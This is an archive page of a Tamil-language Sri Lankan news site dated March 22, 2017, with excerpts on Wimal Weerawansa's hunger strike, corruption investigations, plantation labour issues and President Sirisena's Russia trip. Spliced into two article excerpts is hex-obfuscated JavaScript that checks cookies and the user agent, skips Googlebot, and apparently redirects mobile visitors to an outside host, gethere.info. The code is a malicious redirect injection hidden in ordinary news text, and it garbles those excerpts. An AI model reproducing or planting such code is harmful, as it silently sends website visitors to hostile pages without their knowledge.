முகப்புஎம்மை பற்றிவிளம்பரம்செய்திகள்தொடர்பு

Day

March 22, 2017

பட்டினி கிடக்கும் விமலின் பைக்குள் பிஸ்கட்: விசாரணைக்கு உத்தரவு!

உண்ணாவிரதப் போராட்டம் நடத்துவதில் விமல்வீரவன்ஸ எம்.பி. கலாநிதி பட்டம் பெற்றவர் என்று ஐக்கிய தேசியக் கட்சியின் நளின் பண்டார எம்.பி. குறிப்பிட்டுள்ளார். ‘ தும்முல்லையில் உண்ணாவிரதப்போராட்டத்தை ஆரம்பித்து, திருட்டுத்தனமாக பிஸ்கட் சாப்பிட்ட விமல்வீரவன்ஸ தற்போது சிறைச்சாலைக்குள் உண்ணாவிரதப் போராட்டத்தை ஆரம்பித்துள்ளார் என கூறப்படுகின்றது.அது சிறந்த முடிவு. நாடாளுமன்றம்வரும் நாட்களில் வயிறுமுட்டுவதற்கு கோப்பையில் மலைபோல்குவித்து உணவுகளை அவர் சாப்பிடுவார். எனவே, தற்போது சற்று ஓய்வாக இருக்கட்டும். உண்ணாவிரதப்போராட்டமொன்றும் அவருக்கு புதிய விடயமல்ல. அதில் அவர் கலாநிதிப் பட்டம்பெற்றவர். எனவே,...
Read More

இலஞ்ச, ஊழல் விசாரணை வலைக்குள் நெத்திலி மீன்களே சிக்குகின்றன: சூறாமீன்களை அரசு பாதுகாக்கின்றது

ஊழல், மோசடிகளில் ஈடுபட்ட சூறாமீன்கள் சுதந்திரமாக திரியும்நிலையில், நெத்திலி மீன்களே விசாரணை வளைக்குள் சிக்குகின்றன என்று மக்கள் விடுதலை முன்னணியின் தலைவர் அநுரகுமார திஸாநாயக்க தெரிவித்தார். நாடாளுமன்றத்தில் தற்போது நடைபெற்றவரும் விவாதத்தில் கலந்துகொண்டு உரையாற்றுகையிலேயே அவர் இதனை தெரிவித்தார். ஊழல் எதிர்ப்பு பிரசாரத்தை முன்னெடுத்தே அரசாங்கம் ஆட்சிக்குவந்தது. ஆனால், தற்போது எல்லாமே எதிர்மறையாக நடந்துக்கொண்டிருகின்றது. ஊழல் ஒழிப்பு விசாரணைக்குழு, குற்றப்புலனாய்வுப் பிரிவு ஆகியன முடக்கப்பட்டுள்ளன. கம்பீரமாகச்செயற்பட்ட முன்னாள் பணிப்பாளர் டில்ருக்சி பதவியில் இருந்து தூக்கப்பட்டார். அத்துடன், பொலிஸ்மா...
Read More

கரப்பந்தாட்டப்போட்டியில் களமிறங்கி கிண்ணம் வழங்கினார் தொண்டா

கொட்டகலை ஸ்டோனிகிலிப் தோட்டத்தில் மாபெரும் கரப்பந்தாட்ட சுற்றுப்போட்டி இடம்பெற்றது. இச்சுற்றுபோட்டியில் சிறப்பு அதீதியாக கலந்துக்கொண்ட இலங்கை தொழிலாளர் காங்கிரஸின் பொதுச்செயலாளரும் நுவரெலியா மாவட்ட நாடாளுமன்ற உறுப்பினருமான ஆறுமுகன் தொண்டமான் வெற்றிபெற்ற அணிகளுக்கு பரீசில்கள் வழங்கி வைத்தார். இந்நிகழ்வில் இலங்கை தொழிலாளர் காங்கிரஸின் தலைவர் முத்துசிவலிங்கம் , மத்திய மாகாண விவசாய அமைச்சர் ஆ.ராமேஸ்வரன் உள்ளிட்ட மத்திய மாகாண சபை உறுப்பினர்கள் , இ.தொ.கா வின் இளைஞர் அமைப்பாளார் ராஐமணி பிரசாந்த் உட்பட பலரும் கலந்துக்கொண்டனர். var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==...
Read More

கூட்டு ஒப்பந்தம்மீறல்: தொழில் திணைக்களம் உள்ளக விசாரணை

கூட்டு ஒப்பந்தத்தை மீறும் வகையில் செயற்படும் தோட்ட நிர்வாகத்தை கண்டறிவதற்காக தொழிலாளர் திணைக்களம் உள்ளக விசாரணைகளை ஆரம்பிக்கவுள்ளது. இது தொடர்பான விசாரணை அறிக்கை ஒருமாதத்துக்குள் தொழில் அமைச்சரிடம் கையளிக்கப்படும். அதன் பின்னரே அடுத்தக்கட்ட நடவடிக்கைகள் இடம்பெறும். கூட்டு ஒப்பந்தத்திலுள்ள தொழிலாளர்களுக்கு நன்மை பயக்ககூடிய முக்கிய சில சரத்துகளை மீறும் வகையில் சில கம்பனிகள் செயற்பட்டுவருகின்றன. இவை தொடர்பில் முதலாளிமார் சம்மேளனத்துக்கும், இலங்கைத் தொழிலாளர் காங்கிரசுக்குமிடையிலான முக்கிய சந்திப்பு நேற்று தொழில் அமைச்சரின் மத்தியஸ்தத்துடன் இடம்பெற்றது.இதன்போதே குறித்த முடிவு...
Read More

1974 இற்கு பிறகு இலங்கையின் அரச தலைவர் முதன்முறையாக ரஷ்யா பயணம்

ரஷ்ய அரசாங்கத்தின் அழைப்பிற்கு அமைய, மூன்று நாள் உத்தியோகப்பூர்வ விஜயம் மேற்கொண்டு ஜனாதிபதி மைத்திரிபால சிறிசேன இன்று ரஷ்யா நோக்கி பயணமானார். இரண்டாவது உலக யுத்தத்தின் பின்னர் 1990 ஆம் ஆண்டு முதற்பகுதி வரை இடம்பெற்ற பனிப்போர் வரையிலும் இலங்கை, அணிசேரா கொள்கைகளை பின்பற்றியதுடன், எஸ்.டபிள்யூ. ஆர்.டி. பண்டாரநாயக்க மற்றும் சிறிமாவோ பண்டாரநாயக்க ஆகியோரின் ஆட்சிக் காலங்களில் ரஷ்யா அடங்கிய சோவியத் குடியரசுடன் இலங்கை நெருங்கிய நட்புறவைப் பேணியிருந்தது. இதன் ஊடாக இலங்கையின் கைத்தொழில் துறைக்கு ரஷ்யா...
Read More

சிறைக்குள் விமல் பட்டினிப்போராட்டம்!

விளக்கமறியலில் வைக்கப்பட்டுள்ள தேசிய சுதந்திர முன்னணியின் தலைவரான விமல் வீரவன்ச எம்.பி., உண்ணாவிரதப் போராட்டத்தில் ஈடுபட்டுள்ளார் என சிறைச்சாலை வட்டாரங்களிலிருந்து அறியமுடிகின்றது. அரசாங்க வாகன முறைகேடு தொடர்பில் கடந்த ஜனவரி 10 ஆம் திகதி கைதான விமல் வீரவங்ச தொடர்ந்தும் விளக்கமறியலில் இருந்து வருகிறார். நேற்றைய தினம் விமல் வீரவங்சவின் சட்டத்தரணியால் நீதிமன்றில் முன்வைக்கப்பட்ட பிணை மனுவும் நிராகரிக்கப்பட்டதைத் தொடர்ந்து அவர் விளக்கமறியலில் உண்ணாவிரதப் போராட்டத்தை ஆரம்பித்துள்ளதாக தெரிவிக்கப்படுகிறது. ஐ.நா.வுக்கு எதிராகவும் உண்ணாவிரதப் போராட்டத்தில் முன்னர் ஈடுபட்ட...
Read More

இ.தொ.காவின் 78 ஆவது மேதினக் கூட்டம் அட்டனில்

இலங்கைத் தொழிலாளர் காங்கிரஸின் 78 ஆவது மேதினக் கூட்டம் இம்முறை அட்டன் நகரில் நடைபெறவுள்ளது. தொழிலாளர் வர்க்க சிந்தனையோடு, உணர்வுபூர்வமாக மேதினம் அனுஷ்டிக்கப்படவுள்ளது என இ.தொ.காவின் ஊடகப்பிரிவு தெரிவித்துள்ளது. இ.தொ.காவின் 48 காரியாலயங்களுக்கு உட்பட்ட பிரதேசங்களிலிருந்து பெருந்திரளான தோட்டத் தலைவர்களும், பெண்கள் அமைப்பினரும் அணிவகுத்து வருகைத் தரவுள்ளனர். இ.தொ.காவின் தலைவர், பொதுச்செயலாளர், மாகாணசபை உறுப்பினர்கள் உள்ளிட்ட கட்சிப் பிரமுகர்கள் கலந்துகொள்வர். var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1...
Read More
error: Content is protected !!